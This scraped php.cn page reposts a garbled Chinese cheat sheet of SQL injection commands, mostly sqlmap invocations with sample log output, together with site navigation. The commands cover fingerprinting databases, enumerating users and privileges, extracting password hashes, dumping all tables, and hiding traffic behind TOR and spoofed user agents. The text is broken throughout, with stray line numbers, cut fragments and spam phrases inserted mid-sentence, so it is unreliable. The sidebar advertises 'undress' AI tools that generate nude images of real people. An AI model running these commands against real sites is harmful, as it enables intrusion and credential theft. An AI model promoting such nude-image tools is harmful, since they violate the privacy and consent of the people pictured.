지역 사회
배우다
도구 라이브러리
AI 도구
여가
찾다
한국어
데이터 베이스 MySQL 튜토리얼 注入常用语句

注入常用语句

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
Jun 07, 2016 pm 05:44 PM
일반적으로 사용되는 주입 성명

注入常用语句 T users sinp 4 web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex) DBMS: PostgreSQL : users id blissettnameisnull bunnyming 这个东西,是mickey整理的,不多说了,尊重一下原作者,转载注明mickey整理就好了 21 22 更新 23

注入常用语句

T users sinp> 4 web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex) DBMS: PostgreSQL : users id blissett nameisnull bunny ming 这个东西,是mickey整理的,不多说了,香港服务器,尊重一下原作者,转载注明mickey整理就好了 21 22 更新 23 svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev m=1-v 1 –sql-shell //执行SQL语句 m更详细的信息 options from a configuration INI file 30 sqlmap -c sqlmap.conf 31 32 使用POST方法提交 sqlmap/oracle/post_int.php” –method POST –data “id=1使用COOKIES方式提交,cookie的值用;分割,可以使用TamperData来抓cookies sqlmap使用referer欺骗 sqlmap使用自定义user-agent,或者使用随机使用自带的user-agents.txt sqlmapagent “Mozillapython sqlmap.py sqlmapa “.agents.txt” 46 47 使用基本认证 sqlmap使用Digest认证 sqlmap使用代理,配合TOR sqlmap.1.47:3128sqlmap.1.47:8118 56 57 使用多线程猜解 sqlmap–threads 绕过动态检测,直接指定有注入点的参数,可以使用,分割多个参数,指定user-agent注入 sqlmapp “id sqlmapcatp “cat,id” sqlmapagent” –.7rc1 (http://sqlmap.sourceforge.net)” 64 65 指定数据库,绕过SQLMAP的自动检测 sqlmap/pgsql/get_int.php?id=1-v 2 –dbms “PostgreSQL” MySQL 69 * Oracle 70 * PostgreSQL 71 * Microsoft SQL Server 72 73 指定操作系统,绕过SQLMAP自动检测 sqlmap/pgsql/get_int.php?id=1-v 2 –os “Windows” Linux 77 * Windows 78 79 自定义payload 80 Options: –prefix and –postfix circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the SQL injection by directly providing a injection payload prefix and/or postfix. users . “‘) LIMIT 0, 1″;: .″ test” 87 88 [...] 89 [hh:mm:16] [INFO] testing sql injection on GET parameter ‘id’ with 0 parenthesis 90 [hh:mm:16] [INFO] testing custom injection on GET parameter ‘id’ 91 [hh:mm:16] [TRAFFIC OUT] HTTP request: 92 GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20 93 %28%27test%27=%27test HTTP/1.1 94 Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 95 Host: 192.168.1.121:80 96 Accept-language: en-us,en;q=0.5 97 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, 98 image/png,*/*;q=0.5 99 User-agent: sqlmap/0.7rc1 () 100 Connection: close 101 [...] 102 [hh:mm:17] [INFO] GET parameter ‘id’ is custom injectable 103 [...] 104 105 As you can see, the injection payload for testing for custom injection is: 106 107 id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test 108 109 which URL decoded is: test makes the query syntatically correct to the page query: users (‘test’='test’) LIMIT 0, 1 116 117 In this simple example, sqlmap could detect the SQL injection and exploit it without need to provide a custom injection payload, but sometimes in the real world application it is necessary to provide it. 118 119 页面比较 120 python sqlmap.py -u “?id=1″ –string “luther” -v 1 121 python sqlmap.py -u “?id=1″ –regexp “

lu[\w][\w]er” -v 122 123 排除网站的内容 124 python sqlmap.py -u “?id=1″ –excl-reg “Dynamic content: ([\d]+)” 125 126 多语句测试,php内嵌函数mysql_query(),不支持多语句 127 python sqlmap.py -u “?id=1″ –stacked-test -v 1 128 129 union注入测试 130 python sqlmap.py -u “?id=1″ –union-test -v 1 131 132 unionz注入配合orderby 133 python sqlmap.py -u “?id=1″ –union-test –union-tech orderby -v 1 134 135 python sqlmap.py -u “?id=1″ -v 1 –union-use –banner 136 python sqlmap.py -u “?id=1″ -v 5 –union-use –current-user 137 python sqlmap.py -u “?id=1″ -v 1 –union-use –dbs 138 139 fingerprint 140 python sqlmap.py -u “?id=1″ -v 1 -f 141 python sqlmap.py -u “?name=luther” -v 1 -f -b 142 143 判断当前用户是否是dba 144 python sqlmap.py -u “?id=1″ –is-dba -v 1 145 146 列举数据库用户 147 python sqlmap.py -u “?id=1″ –users -v 0 148 149 列举数据库用户密码 150 python sqlmap.py -u “?id=1″ –passwords -v 0 151 python sqlmap.py -u “?id=1″ –passwords -U sa -v 0 152 153 查看用户权限 154 python sqlmap.py -u “?id=1″ –privileges -v 0 155 python sqlmap.py -u “?id=1″ –privileges -U postgres -v 0 156 157 列数据库 158 python sqlmap.py -u “?id=1″ –dbs -v 0 159 160 列出指定数据库指定表的列名 161 python sqlmap.py -u “?id=1″ –columns -T users -D test -v 1 162 163 列出指定数据库的指定表的指定列的内容 164 python sqlmap.py -u “?id=1″ –dump -T users -D master -C surname -v 0 165 166 指定列的范围从2-4 167 python sqlmap.py -u “?id=1″ –dump -T users -D test –start 2 –stop 4 -v 0 168 169 导出所有数据库,所有表的内容 170 python sqlmap.py -u “?id=1″ –dump-all -v 0 171 172 只列出用户自己新建的数据库和表的内容 173 python sqlmap.py -u “?id=1″ –dump-all –exclude-sysdbs -v 0 174 175 sql query 176 python sqlmap.py -u “?id=1″ –sql-query “SELECT usename FROM pg_user” -v 0 177 python sqlmap.py -u “?id=1″ –sql-query “SELECT host, password FROM mysql.user LIMIT 1, 3″ -v 1 178 179 SELECT usename, passwd FROM pg_shadow ORDER BY usename 180 181 保存和恢复会话 182 python sqlmap.py -u “?id=1″ -b -v 1 -s “sqlmap.log” 183 184 保存选项到INC配置文件 185 python sqlmap.py -u “?id=1″ -b -v 1 –save ===================================================== 2、sqlmap -g "关键词“ //这是通过google搜索注入,现在还不可以,不知道是什么原因,网站空间,可以直接修改为百度 194 3、 195 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 [hh:mm:25] [INFO] testing if the url is stable, wait a few seconds 199 [hh:mm:26] [INFO] url is stable id' is dynamic id' is dynamic id' is dynamic id' 204 [hh:mm:26] [INFO] testing numeric/unescaped injection on GET parameter [hh:mm:26] [INFO] confirming numeric/unescaped injection on GET idid' is numeric/unescaped injectable 209 [hh:mm:26] [INFO] testing MySQL ) 211 [hh:mm:26] [INFO] retrieved: 55 212 [hh:mm:26] [INFO] performed 20 queries in 0 seconds 213 [hh:mm:26] [INFO] confirming MySQL ) 215 [hh:mm:26] [INFO] retrieved: 1 216 [hh:mm:26] [INFO] performed 13 queries in 0 seconds 217 [hh:mm:26] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 218 0, 1 219 [hh:mm:26] [INFO] retrieved: 5 220 [hh:mm:26] [INFO] performed 13 queries in 0 seconds 221 remote DBMS: MySQL >= 5.0.0 4、指定参数注入 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 228 -p "id" [hh:mm:17] [INFO] testing if the url is stable, wait a few seconds 232 [hh:mm:18] [INFO] url is stable id' 234 [hh:mm:18] [INFO] testing numeric/unescaped injection on parameter [hh:mm:18] [INFO] confirming numeric/unescaped injection on idid' is numeric/unescaped injectable 239 [...] Or if you want to provide more than one parameter, for instance: $ python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 246 1 -p "cat,id" 5、指定方法和post的数据 250 python sqlmap.py -u "http://192.168.1.47/page.php" --method "POST" -- 251 data "id=1&cat=2" 6、指定cookie,可以注入一些需要登录的地址 255 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --cookie 256 "COOKIE_VALUE" 7、通过代理注入 260 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --proxy 261 "http://127.0.0.1:8118" 262 8、指定关键词,香港服务器,也可以不指定。程序会根据返回结果的hash自动判断 263 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --string 264 "STRING_ON_TRUE_PAGE" 265 9、指定数据,这样就不用猜测其他的数据库里。可以提高效率。 266 --remote-dbms 267 10、指纹判别数据库类型 268 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -f 269 11、获取banner信息 270 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -b .

 

posted on

본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.

핫 AI 도구

Undresser.AI Undress

Undresser.AI Undress

사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover

AI Clothes Remover

사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool

Undress AI Tool

무료로 이미지를 벗다

Clothoff.io

Clothoff.io

AI 옷 제거제

AI Hentai Generator

AI Hentai Generator

AI Hentai를 무료로 생성하십시오.

더보기

인기 기사

R.E.P.O. 에너지 결정과 그들이하는 일 (노란색 크리스탈)
2 몇 주 전 By 尊渡假赌尊渡假赌尊渡假赌
Repo : 팀원을 부활시키는 방법
4 몇 주 전 By 尊渡假赌尊渡假赌尊渡假赌
헬로 키티 아일랜드 어드벤처 : 거대한 씨앗을 얻는 방법
4 몇 주 전 By 尊渡假赌尊渡假赌尊渡假赌
스플릿 소설을이기는 데 얼마나 걸립니까?
3 몇 주 전 By DDD
R.E.P.O. 파일 저장 위치 : 어디에 있고 그것을 보호하는 방법은 무엇입니까?
3 몇 주 전 By DDD
더보기

뜨거운 도구

메모장++7.3.1

메모장++7.3.1

사용하기 쉬운 무료 코드 편집기

SublimeText3 중국어 버전

SublimeText3 중국어 버전

중국어 버전, 사용하기 매우 쉽습니다.

스튜디오 13.0.1 보내기

스튜디오 13.0.1 보내기

강력한 PHP 통합 개발 환경

드림위버 CS6

드림위버 CS6

시각적 웹 개발 도구

SublimeText3 Mac 버전

SublimeText3 Mac 버전

신 수준의 코드 편집 소프트웨어(SublimeText3)

더보기

뜨거운 주제

Gmail 이메일의 로그인 입구는 어디에 있나요?
7322
9
자바 튜토리얼
1625
14
Cakephp 튜토리얼
1350
46
라라벨 튜토리얼
1262
25
PHP 튜토리얼
1209
29
더보기
Related knowledge
공개된 Spring 주석: 공통 주석 분석 공개된 Spring 주석: 공통 주석 분석 Dec 30, 2023 am 11:28 AM

Spring은 Java 개발을 단순화하고 향상시키기 위해 많은 주석을 제공하는 오픈 소스 프레임워크입니다. 이 기사에서는 일반적으로 사용되는 Spring 주석을 자세히 설명하고 구체적인 코드 예제를 제공합니다. @Autowired: Autowired @Autowired 주석은 Spring 컨테이너에 Bean을 자동으로 연결하는 데 사용할 수 있습니다. 종속성이 필요한 @Autowired 주석을 사용하면 Spring은 컨테이너에서 일치하는 Bean을 찾아 자동으로 주입합니다. 샘플 코드는 다음과 같습니다. @Auto

캔버스 프레임워크를 배우고 일반적으로 사용되는 캔버스 프레임워크에 대해 자세히 설명합니다. 캔버스 프레임워크를 배우고 일반적으로 사용되는 캔버스 프레임워크에 대해 자세히 설명합니다. Jan 17, 2024 am 11:03 AM

Canvas 프레임워크 탐색: 일반적으로 사용되는 Canvas 프레임워크가 무엇인지 이해하려면 특정 코드 예제가 필요합니다. 소개: Canvas는 풍부한 그래픽 및 애니메이션 효과를 얻을 수 있는 HTML5에서 제공되는 그리기 API입니다. 그리기의 효율성과 편의성을 향상시키기 위해 많은 개발자들이 다양한 Canvas 프레임워크를 개발했습니다. 이 기사에서는 일반적으로 사용되는 몇 가지 캔버스 프레임워크를 소개하고 독자가 이러한 프레임워크를 사용하는 방법을 더 깊이 이해하는 데 도움이 되는 특정 코드 예제를 제공합니다. 1. EaselJS 프레임워크 Ea

15 일반적으로 사용되는 통화 서클 이스케이프 인덱스 기술 분석 15 일반적으로 사용되는 통화 서클 이스케이프 인덱스 기술 분석 Mar 03, 2025 pm 05:48 PM

상위 15 개의 Bitcoin Escape Index에 대한 심층 분석 : 2025 년 시장 전망이 기사는 일반적으로 사용되는 15 개의 Bitcoin Escape Index를 깊이 분석하며, 그 중 비트 코인 Rhodl 비율, USDT 현재 자산 관리 및 Altcoin 계절 지수가 2024 년에 탈출 지수에 도달하여 시장의 관심을 끌었습니다. 투자자는 어떻게 잠재적 위험을 처리해야합니까? 이러한 지표를 하나씩 해석하고 합리적인 대응 전략을 탐색합시다. 1. 주요 지표에 대한 자세한 설명 AHR999 Coin Hoarding Indicator : AHR999에 의해 생성, 비트 코인 고정 투자 전략 지원. 현재 값은 1.21로 대기중인 범위에 있으므로 조심해야합니다. AHR999에 대한 링크 Escape Top Indicator : AHR999 Coin Hoarding Indicator 보충제, 시장의 최고를 식별하는 데 사용됩니다. 현재 값은 이번 주 2.48입니다

Oracle 데이터베이스의 일반적인 데이터 유형 소개 Oracle 데이터베이스의 일반적인 데이터 유형 소개 Mar 08, 2024 am 09:45 AM

Oracle 데이터베이스는 다양한 요구 사항을 충족하기 위해 여러 데이터 유형을 지원하는 일반적으로 사용되는 관계형 데이터베이스 관리 시스템입니다. Oracle 데이터베이스를 사용할 때에는 데이터베이스의 데이터 유형을 이해하는 것이 매우 중요합니다. 이 문서에서는 특정 코드 예제와 함께 Oracle 데이터베이스에서 일반적으로 사용되는 데이터 유형을 소개합니다. 1. 숫자 데이터 유형 NUMBERNUMBER는 Oracle 데이터베이스에서 가장 일반적으로 사용되는 숫자 데이터 유형으로 정수 또는 부동 소수점 숫자를 저장하는 데 사용됩니다. NUMBER 데이터 유형은 정밀도를 지정할 수 있습니다.

Java에서 일반적으로 사용되는 데이터 구조는 무엇입니까? Java 데이터 구조에 대한 심층 분석 Java에서 일반적으로 사용되는 데이터 구조는 무엇입니까? Java 데이터 구조에 대한 심층 분석 Jan 09, 2024 pm 11:29 PM

Java는 널리 사용되는 프로그래밍 언어이며 데이터 구조는 개발 프로세스의 필수적인 부분입니다. 데이터 구조는 데이터를 구성 및 관리하고 프로그램 실행 효율성을 향상시키는 데 도움이 됩니다. Java에서 일반적으로 사용되는 데이터 구조에는 배열, 연결 목록, 스택, 큐, 트리, 그래프 등이 포함됩니다. 이 기사에서는 일반적으로 사용되는 Java 데이터 구조에 대한 심층 분석을 제공하고 특정 코드 예제를 제공합니다. 1. 배열 배열은 동일한 유형의 요소를 저장할 수 있는 선형 데이터 구조입니다. Java에서는 다음을 사용하여 선언할 수 있습니다.

PHP8.0의 다중 캐치 문 PHP8.0의 다중 캐치 문 May 14, 2023 pm 01:51 PM

웹 애플리케이션이 개발되면서 PHP 언어가 웹 개발에 널리 사용되었습니다. PHP8.0 버전에서는 새로운 언어 기능인 multi-catch 문이 도입되었습니다. 다중 캐치 문이란 무엇입니까? 이전 PHP 버전에서는 개발자가 여러 예외 유형을 처리하기 위해 여러 catch 문을 작성해야 했습니다. 예를 들어, 다음 코드 블록은 두 가지 다른 예외의 처리를 보여줍니다.

MySQL에서 테이블 잠금을 해제하는 명령문을 구현하는 방법은 무엇입니까? MySQL에서 테이블 잠금을 해제하는 명령문을 구현하는 방법은 무엇입니까? Nov 08, 2023 pm 06:28 PM

MySQL에서 테이블 잠금을 해제하는 명령문을 구현하는 방법은 무엇입니까? MySQL에서 테이블 잠금은 데이터 무결성과 일관성을 보호하기 위해 일반적으로 사용되는 잠금 메커니즘입니다. 트랜잭션이 테이블을 읽고 쓰는 동안 다른 트랜잭션은 테이블을 수정할 수 없습니다. 이 잠금 메커니즘은 어느 정도 데이터 일관성을 보장하지만 다른 트랜잭션이 차단될 수도 있습니다. 따라서 어떤 이유로 트랜잭션을 계속할 수 없는 경우 다른 트랜잭션이 계속될 수 있도록 테이블을 수동으로 잠금 해제해야 합니다. MySQL은 다양한 기능을 제공합니다.

Go 언어에서 일반적으로 사용되는 기능은 무엇입니까? Go 언어에서 일반적으로 사용되는 기능은 무엇입니까? Mar 28, 2024 pm 02:45 PM

Go 언어에서 일반적으로 사용되는 기능은 무엇입니까? ——Go 언어에서 일반적으로 사용되는 기능과 사용법을 살펴보세요. 널리 사용되는 정적인 유형의 프로그래밍 언어인 Go 언어는 서버 측 개발, 네트워크 프로그래밍, 클라우드 컴퓨팅 등과 같은 다양한 분야에서 널리 사용됩니다. Go 언어에서 함수는 기본 코드 구성 단위로서 프로그램 실행의 중요한 부분입니다. 이 기사에서는 독자가 Go 언어의 핵심 기능을 더 잘 이해할 수 있도록 Go 언어에서 일반적으로 사용되는 기능과 사용법을 살펴보겠습니다. 1. "fun"이라는 키워드를 사용하여 Go 언어에서 함수 선언 및 함수 호출

See all articles